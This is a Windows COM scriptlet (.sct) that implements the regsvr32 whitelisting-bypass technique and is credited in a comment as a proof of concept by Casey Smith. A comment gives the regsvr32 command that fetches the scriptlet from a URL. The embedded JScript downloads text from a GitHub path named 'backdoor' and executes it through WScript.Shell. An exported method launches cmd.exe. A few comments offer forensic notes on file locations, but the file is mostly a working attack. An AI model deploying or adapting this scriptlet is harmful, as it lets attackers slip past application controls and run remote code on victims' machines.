<?XML version="1.0"?>
<scriptlet>

<registration
    description="Bandit"
    progid="Bandit"
    version="1.00"
    classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
	>
	
	<!-- regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
	<!-- DFIR -->
	<!--		.sct files are downloaded and executed from a path like this -->
	<!-- Though, the name and extension are arbitary.. -->
	<!-- c:\users\USER\appdata\local\microsoft\windows\temporary internet files\content.ie5\2vcqsj3k\file[2].sct -->
	<!-- Based on current research, no registry keys are written, since call "uninstall" -->
	
	
	<!-- Proof Of Concept - Casey Smith @subTee -->
	<script language="JScript">
		<![CDATA[
	
			//Expects to run behind a proxy... Deal with it. 
									 	
										//Uncomment.
										w = new ActiveXObject("WScript.Shell");
										//v = w.RegRead("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ProxyServer");
										//q = v.split("=")[1].split(";")[0];
										h = new ActiveXObject("WinHttp.WinHttpRequest.5.1");
										//h.SetProxy(2,q);
										h.Open("GET","https://raw.githubusercontent.com/memphis8/backdoor/master/dlldownload",false);
										h.Send();
										c = h.ResponseText;
										r = new ActiveXObject("WScript.Shell").Exec(c);
									
	
		]]>
	</script>
</registration>

<public>
    <method name="Exec"></method>
</public>
<script language="JScript">
<![CDATA[
	
	function Exec()
	{
		var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");
	}
	
]]>
</script>

</scriptlet>
